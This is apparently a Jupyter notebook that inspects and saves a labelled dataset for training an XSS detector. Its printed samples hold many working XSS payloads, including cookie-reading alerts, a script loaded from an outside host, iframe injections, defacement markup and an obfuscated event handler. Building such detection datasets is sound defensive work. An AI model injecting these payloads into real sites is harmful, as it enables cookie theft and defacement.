3565,"<meta name=""ResourceLoaderDynamicStyles"" content=""""/>",0,event_handler,53,kaggle,event,False,True,False,False


Total: 22


In [7]:
# ============================================
# ANÁLISIS FINAL – SANITY CHECK DEL DATASET
# ============================================

import pandas as pd
import numpy as np

print("=== INFO GENERAL ===")
print("Shape df:", df.shape)
print("Columnas:", list(df.columns))

print("\n=== Distribución Label ===")
print(df["Label"].value_counts())
print("\n=== Distribución Label (proporciones) ===")
print(df["Label"].value_counts(normalize=True).round(3))

print("\n=== Distribución por source ===")
print(df["source"].value_counts())
print("\n=== Label vs source ===")
print(pd.crosstab(df["source"], df["Label"], margins=True))

# --------------------------------------------
# 1. Muestra aleatoria global
# --------------------------------------------
print("\n=== Muestra aleatoria global (15 filas) ===")
display(df.sample(15, random_state=123))

# --------------------------------------------
# 2. Muestras aleatorias por Label
# --------------------------------------------
print("\n=== Ejemplos de BENIGNOS (Label=0) ===")
display(df[df["Label"] == 0].sample(10, random_state=123) if (df["Label"] == 0).sum() >= 10 else df[df["Label"] == 0])

print("\n=== Ejemplos de MALICIOUS (Label=1) ===")
display(df[df["Label"] == 1].sample(10, random_state=456) if (df["Label"] == 1).sum() >= 10 else df[df["Label"] == 1])

# --------------------------------------------
# 3. Si existe family_main, validar que esté coherente
# --------------------------------------------
if "family_main" in df.columns:
    print("\n=== Distribución de family_main ===")
    print(df["family_main"].value_counts())

    print("\n=== family_main vs Label (conteos) ===")
    print(pd.crosstab(df["family_main"], df["Label"], margins=True))

    print("\n=== Ejemplos por family_main y Label ===")
    for fam in df["family_main"].unique():
        for lab in [0, 1]:
            subset = df[(df["family_main"] == fam) & (df["Label"] == lab)]
            if subset.empty:
                continue
            print(f"\n>>> family_main = {fam} | Label = {lab} | n = {subset.shape[0]}")
            display(subset.sample(min(3, subset.shape[0]), random_state=lab+hash(fam) % 1000))

# --------------------------------------------
# 4. Extremos por longitud (para ver rarezas)
# --------------------------------------------
print("\n=== 10 payloads MÁS CORTOS ===")
display(df.sort_values("len_after_clean", ascending=True).head(10))

print("\n=== 10 payloads MÁS LARGOS ===")
display(df.sort_values("len_after_clean", ascending=False).head(10))

# --------------------------------------------
# 5. Check rápido de duplicados
# --------------------------------------------
print("\n=== Duplicados exactos (Sentence_clean + Label) ===")
dup_count = df.duplicated(subset=["Sentence_clean", "Label"]).sum()
print("Total duplicados:", dup_count)

if dup_count > 0:
    print("\nEjemplos de duplicados:")
    dups = df[df.duplicated(subset=["Sentence_clean", "Label"], keep=False)]
    display(dups.head(10))


=== INFO GENERAL ===
Shape df: (15351, 10)
Columnas: ['Sentence_clean', 'Label', 'families_str', 'len_after_clean', 'source', 'family_main', 'has_script_tag', 'has_event', 'has_js_uri', 'has_iframe']

=== Distribución Label ===
1    11703
0     3648
Name: Label, dtype: int64

=== Distribución Label (proporciones) ===
1    0.762
0    0.238
Name: Label, dtype: float64

=== Distribución por source ===
kaggle    10835
github     4516
Name: source, dtype: int64

=== Label vs source ===
Label      0      1    All
source                    
github   131   4385   4516
kaggle  3517   7318  10835
All     3648  11703  15351

=== Muestra aleatoria global (15 filas) ===


Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source,family_main,has_script_tag,has_event,has_js_uri,has_iframe
13308,"<script>alert(123)</script>][][faq_id,faq_question][]&sch_page=1&sch_limit=10&sch_domain=*&sch_string=""><script>alert(2)</script\\\\.&submit=go",1,script_tag,140,github,script,True,False,False,False
7900,<legend id=x tabindex=1 onfocusin=alert(1)></legend>,1,event_handler,52,kaggle,event,False,True,False,False
13913,"<bodyonload=""alert('xss - zj')"">",1,body_tag|event_onload,32,github,event,False,True,False,False
9742,<xmp onpointerenter=alert(1)>XSS</xmp>,1,event_handler,38,kaggle,event,False,True,False,False
3103,"<style>@keyframes x{}</style><pre style=""animation-name:x"" onanimationend=""alert(1)""></pre>",1,event_handler,91,kaggle,event,False,True,False,False
2752,"<li><a href=""#CITEREFNilsson1998"">Nilsson 1998 </a>, chpt. 15 </li> </ul>",0,other,73,kaggle,benign,False,False,False,False
12692,<center><font color=red size=20 face=impact>by+panzerturk+hepsi5+am&#305;nakoim</font></center>,1,text_container_tag,95,github,benign,False,False,False,False
8393,"<h3><span class=""mw-headline"" id=""Artificial_neural_networks"">Artificial neural networks",0,other,88,kaggle,benign,False,False,False,False
6777,"<mark onbeforecopy=""alert(1)"" contenteditable>test</mark>",1,event_handler,57,kaggle,event,False,True,False,False
5487,<basefont id=x tabindex=1 ondeactivate=alert(1)></basefont><input id=y autofocus>,1,event_handler,81,kaggle,event,False,True,False,False



=== Ejemplos de BENIGNOS (Label=0) ===


Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source,family_main,has_script_tag,has_event,has_js_uri,has_iframe
10444,"<li><cite id=""CITEREFVinge1993"" class=""citation journal""><a href=""/wiki/Vernor_Vinge"" title=""Vernor Vinge"">Vinge, Vernor </a> (1993). <a rel=""nofollow"" class=""external text"" href=""http://www-rohan...",0,maybe_polyglot,1197,kaggle,benign,False,False,False,False
692,"<div role=""note"" class=""hatnote navigation-not-searchable"">Main article: <a href=""/wiki/Automated_planning_and_scheduling"" title=""Automated planning and scheduling"">Automated planning and scheduli...",0,other,210,kaggle,benign,False,False,False,False
7190,"<li><a href=""#CITEREFPooleMackworthGoebel1998"">Poole, Mackworth &amp; Goebel 1998 </a>, pp.&#160;113–132 </li>",0,other,110,kaggle,benign,False,False,False,False
5109,"<li class=""toclevel-1 tocsection-1""><a href=""#History""><span class=""tocnumber"">1",0,other,80,kaggle,benign,False,False,False,False
2357,"</span><a href=""/w/index.php?title=Artificial_intelligence&amp;action=edit&amp;section=62"" title=""Edit section: Computationalism and functionalism"">edit </a><span class=""mw-editsection-bracket"">]",0,maybe_polyglot,195,kaggle,benign,False,False,False,False
5346,"<li class=""toctree-l1""><a class=""reference internal"" href=""topics/autothrottle.html"">AutoThrottle extension</a></li>",0,other,116,kaggle,benign,False,False,False,False
986,"</span>. </cite><span title=""ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;rft.genre=unknown&amp;rft.jtitle=Tech+Insider&amp;rft.atitle=The+mysterious+artificial+i...",0,maybe_polyglot,481,kaggle,benign,False,False,False,False
94,"<li><a href=""/wiki/Automated_planning_and_scheduling"" title=""Automated planning and scheduling"">Planning </a> </li>",0,other,115,kaggle,benign,False,False,False,False
1760,"<li><a href=""#CITEREFMcCorduck2004"">McCorduck 2004 </a>, pp.&#160;448–449 </li> </ul>",0,other,85,kaggle,benign,False,False,False,False
8920,"</div> </td><td class=""navbox-image"" rowspan=""6"" style=""width:1px;padding:0px 0px 0px 2px"">",0,other,91,kaggle,benign,False,False,False,False



=== Ejemplos de MALICIOUS (Label=1) ===


Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source,family_main,has_script_tag,has_event,has_js_uri,has_iframe
14357,<body/**/onload=alert(1)>/modems/descriptions/mdcsmica.inf&swtype=eval&code=,1,body_tag|event_onload,76,github,event,False,True,False,False
12145,<script/src=http://kusomiso.com/xss.js></script>&submit=����,1,script_tag,60,github,script,True,False,False,False
4543,"<link oncopy=""alert(1)"" contenteditable>test</link>",1,event_handler,51,kaggle,event,False,True,False,False
11481,"<script>alert(""iblaze"")</script>&searchdetails.querytype=all&search=search&searchdetails.includeallfields=true&searchdetails.searchall=true&searchdetails.summarylanguage=''&searchdetails.publicati...",1,script_tag,916,github,script,True,False,False,False
2488,<input onauxclick=alert(1)>,1,event_handler,27,kaggle,event,False,True,False,False
10017,"<em ondblclick=""alert(1)"">test</em>",1,event_handler,35,kaggle,event,False,True,False,False
14896,</applet onreadystatechange>,1,event_onreadystatechange,28,github,event,False,True,False,False
1502,<data id=x tabindex=1 onfocus=alert(1)></data>,1,event_handler,46,kaggle,event,False,True,False,False
12225,"<script>alert(string.fromcharcode(66,121,32,107,117,115,111,109,105,115,111,46,99,111,109))</script>\n&newsletter=1&submit=sign up",1,script_tag,129,github,script,True,False,False,False
12939,<script>alert('xss')</script>&submit=cerca+>&as_sitesearch=http://www10.gencat.net/agaur_web&site=default_collection&idioma=,1,script_tag,124,github,script,True,False,False,False



=== Distribución de family_main ===
event     7667
benign    4030
script    3408
iframe     210
js_uri      36
Name: family_main, dtype: int64

=== family_main vs Label (conteos) ===
Label           0      1    All
family_main                    
benign       3626    404   4030
event           8   7659   7667
iframe          0    210    210
js_uri          0     36     36
script         14   3394   3408
All          3648  11703  15351

=== Ejemplos por family_main y Label ===

>>> family_main = benign | Label = 0 | n = 3626


Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source,family_main,has_script_tag,has_event,has_js_uri,has_iframe
9350,"</span>. University of Michigan Press. <a href=""/wiki/International_Standard_Book_Number"" title=""International Standard Book Number"">ISBN </a>&#160;<a href=""/wiki/Special:BookSources/978-0-262-581...",0,maybe_polyglot,746,kaggle,benign,False,False,False,False
159,"<li><cite id=""CITEREFLenatGuha1989"" class=""citation book""><a href=""/wiki/Douglas_Lenat"" title=""Douglas Lenat"">Lenat, Douglas </a>; Guha, R. V. (1989). <i>Building Large Knowledge-Based Systems </i...",0,maybe_polyglot,853,kaggle,benign,False,False,False,False
6273,"<li id=""cite_note-sak2014-269""><span class=""mw-cite-backlink""><b><a href=""#cite_ref-sak2014_269-0"">^ </a> </b>",0,other,110,kaggle,benign,False,False,False,False



>>> family_main = benign | Label = 1 | n = 404


Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source,family_main,has_script_tag,has_event,has_js_uri,has_iframe
13865,<font+color=red size=70><marquee>xssed_by_samthg</marquee></font><,1,marquee_tag|text_container_tag,66,github,benign,False,False,False,False
13828,<marquee><h1>defaced_by_ironzorg</h1></marquee>.html,1,marquee_tag|header_tag,52,github,benign,False,False,False,False
3831,top[“al”+”ert”](1),1,other,18,kaggle,benign,False,False,False,False



>>> family_main = event | Label = 0 | n = 8


Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source,family_main,has_script_tag,has_event,has_js_uri,has_iframe
2134,"<meta name=""viewport"" content=""width=device-width, initial-scale=1.0"">",0,event_handler,70,kaggle,event,False,True,False,False
9736,"<meta name=""referrer"" content=""origin-when-cross-origin""/>",0,event_handler,58,kaggle,event,False,True,False,False
4927,"<link rel=""stylesheet"" href=""/w/load.php?lang=en&amp;modules=ext.cite.styles%7Cext.flaggedRevs.basic%2Cicons%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimedi...",0,event_handler|maybe_polyglot,463,kaggle,event,False,True,False,False



>>> family_main = event | Label = 1 | n = 7659


Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source,family_main,has_script_tag,has_event,has_js_uri,has_iframe
4007,"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><samp id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></samp>",1,event_handler|maybe_polyglot,178,kaggle,event,False,True,False,False
7280,<data onpointermove=alert(1)>XSS</data>,1,event_handler,39,kaggle,event,False,True,False,False
9081,<abbr onpointerenter=alert(1)>XSS</abbr>,1,event_handler,40,kaggle,event,False,True,False,False



>>> family_main = js_uri | Label = 1 | n = 36


Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source,family_main,has_script_tag,has_event,has_js_uri,has_iframe
10225,URL=javascript:alert(''),1,javascript_uri,24,kaggle,js_uri,False,False,True,False
7468,"<BGSOUND SRC=""javascript:alert('');"">",1,javascript_uri,37,kaggle,js_uri,False,False,True,False
2781,"=""javascript:alert('')",1,javascript_uri,22,kaggle,js_uri,False,False,True,False



>>> family_main = script | Label = 0 | n = 14


Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source,family_main,has_script_tag,has_event,has_js_uri,has_iframe
1720,"<script type=""text/javascript"">",0,script_tag,31,kaggle,script,True,False,False,False
1812,"<script src=""_static/language_data.js""></script>",0,script_tag,48,kaggle,script,True,False,False,False
4038,"<script type=""text/javascript"" id=""documentation_options"" data-url_root=""./"" src=""_static/documentation_options.js""></script>",0,script_tag,125,kaggle,script,True,False,False,False



>>> family_main = script | Label = 1 | n = 3394


Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source,family_main,has_script_tag,has_event,has_js_uri,has_iframe
11613,"<script>alert(1)</script></textarea><script>alert(""kaksii_was_here"")<script>alert('kaksii_was_here');alert(1)</script>""</html><html><script>alert(10111)</script><div align=center> <font size=4><te...",1,script_tag|plain_tag|text_container_tag,313,github,script,True,False,False,False
12404,<script>alert(1337)</script>><marquee><h1>xss by xylitol</h1></marquee>defacing+haxored+hacking+deface+owned+ownz+mass&v=0&c=1&p=1&r=1182830238786,1,script_tag|marquee_tag|header_tag,146,github,script,True,False,False,False
11230,<script \n\r>alert(/xss by turkpower - from turkey/);</script><h1>xss by turkpower - from turkey</h1>,1,script_tag|header_tag,99,github,script,True,False,False,False



>>> family_main = iframe | Label = 1 | n = 210


Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source,family_main,has_script_tag,has_event,has_js_uri,has_iframe
10870,<iframe+src=http://google.com>>&image.x=0&image.y=0,1,iframe_tag,51,github,iframe,False,False,False,True
11153,"<iframe+src=""http://xssed.com""></iframe>",1,iframe_tag,40,github,iframe,False,False,False,True
14571,"<iframe/src=""http://xssed.com"">",1,iframe_tag,31,github,iframe,False,False,False,True



=== 10 payloads MÁS CORTOS ===


Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source,family_main,has_script_tag,has_event,has_js_uri,has_iframe
96,</ul>,0,other,5,kaggle,benign,False,False,False,False
276,</dl>,0,other,5,kaggle,benign,False,False,False,False
83,</li>,0,other,5,kaggle,benign,False,False,False,False
3736,<<tr>,0,other,5,kaggle,benign,False,False,False,False
1101,</h3>,0,other,5,kaggle,benign,False,False,False,False
4932,</div,0,other,5,kaggle,benign,False,False,False,False
3049,}}();,0,other,5,kaggle,benign,False,False,False,False
4545,<h3 >,0,other,5,kaggle,benign,False,False,False,False
4206,</dd>,0,other,5,kaggle,benign,False,False,False,False
133,<div>,0,other,5,kaggle,benign,False,False,False,False



=== 10 payloads MÁS LARGOS ===


Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source,family_main,has_script_tag,has_event,has_js_uri,has_iframe
13563,<script >alert(document.cookie)</script>&manufacture=&manufacture=&manufacture=&manufacture=&manufacture=&manufacture=&manufacture=&manufacture=&manufacture=&manufacture=&manufacture=&manufacture=...,1,script_tag,2854,github,script,True,False,False,False
15209,"<p>example usage:</p> *<pre><code>// basic mask:var mymask = new ext.loadmask(ext.getbody(), {msg:\\\\""please wait...\\\\""});mymask.show();</code></pre> * @constructor * create a new loadmask * @p...",1,text_container_tag|event_onload,2686,github,event,False,True,False,False
15230,\\\\'use strict\\\\';var chai = require(\\\\'chai\\\\');chai.assertion.includestack = true;require(\\\\'chai\\\\').should();var expect = require(\\\\'chai\\\\').expect;var nodepath = require(\\\\'...,1,event_onload,2685,github,event,False,True,False,False
15208,"< 1) { js.onload = function(){parent();}; } head.appendchild(js); if(unique_files.length) { parent(); } } else { // otherwise, load them in parallel js.src = file; document.body.appendchild(js); i...",1,event_onload|event_onerror,2599,github,event,False,True,False,False
10480,"</p><p>Artificial intelligence was founded as an academic discipline in 1955, and in the years since has experienced several waves of optimism,<sup id=""cite_ref-Optimism_of_early_AI_9-0"" class=""re...",0,maybe_polyglot,2587,kaggle,benign,False,False,False,False
5713,"<a href=""/wiki/Natural_language_processing"" title=""Natural language processing"">Natural language processing </a><sup id=""cite_ref-Natural_language_processing_120-0"" class=""reference""><a href=""#cit...",0,maybe_polyglot,2538,kaggle,benign,False,False,False,False
15187,"onmouseover=""this.style.display='none'; if (document.cookie.indexof('visited')>=0) {} else { document.getelementbyid('wpwrap').innerhtml=atob('pgxpbmsgcmvspsdzdhlszxnozwv0jybpzd0ny29sb3jzlwzyzxnol...",1,event_onmouseover,2501,github,event,False,True,False,False
15250,"<script>ymedia.use(""media-rmp"", function(y){y.media.rmp.load({""srcnode"":""#mediabankrate_container"",""continueonerror"":true,""response"":""\\\\r\\\\n--dali-response-split-5731c5f829d1f\\\\r\\\\ncontent...",1,script_tag|iframe_tag|header_tag|text_container_tag|event_onerror,2413,github,script,True,True,False,True
6908,"<p>Artificial Intelligence has inspired numerous creative applications including its usage to produce visual art. The exhibition ""Thinking Machines: Art and Design in the Computer Age, 1959–1989"" ...",0,maybe_polyglot,2394,kaggle,benign,False,False,False,False
1438,"</p><p>Concern over risk from artificial intelligence has led to some high-profile donations and investments. A group of prominent tech titans including <a href=""/wiki/Peter_Thiel"" title=""Peter Th...",0,maybe_polyglot,2394,kaggle,benign,False,False,False,False



=== Duplicados exactos (Sentence_clean + Label) ===
Total duplicados: 0


In [8]:
# ============================================
# GUARDAR DATASET FINAL LIMPIO
# ============================================
from pathlib import Path

# Si ya tienes OUTPUT_DIR definido en tu notebook/proyecto, úsalo.
# Si no, se guardará en la carpeta actual.
base_dir = Path.cwd()
try:
    output_dir = OUTPUT_DIR  # si existe en tu entorno
except NameError:
    output_dir = base_dir / "data_processed"

output_dir.mkdir(parents=True, exist_ok=True)

path_full   = output_dir / "xss_full_clean_with_families.csv"
path_kaggle = output_dir / "xss_kaggle_clean_with_families.csv"
path_github = output_dir / "xss_github_clean_with_families.csv"

# Dataset completo
df.to_csv(path_full, index=False)

# Subsets por source (útil para entrenar vs probar en tu sistema)
df_kaggle = df[df["source"] == "kaggle"].copy()
df_github = df[df["source"] == "github"].copy()

df_kaggle.to_csv(path_kaggle, index=False)
df_github.to_csv(path_github, index=False)

print("Guardado:")
print("  - Full  :", path_full)
print("  - Kaggle:", path_kaggle, f"(shape: {df_kaggle.shape})")
print("  - GitHub:", path_github, f"(shape: {df_github.shape})")


Guardado:
  - Full  : d:\Archivos de Usuario\Documents\xss-cookie\notebooks\data\data_processed\xss_full_clean_with_families.csv
  - Kaggle: d:\Archivos de Usuario\Documents\xss-cookie\notebooks\data\data_processed\xss_kaggle_clean_with_families.csv (shape: (10835, 10))
  - GitHub: d:\Archivos de Usuario\Documents\xss-cookie\notebooks\data\data_processed\xss_github_clean_with_families.csv (shape: (4516, 10))
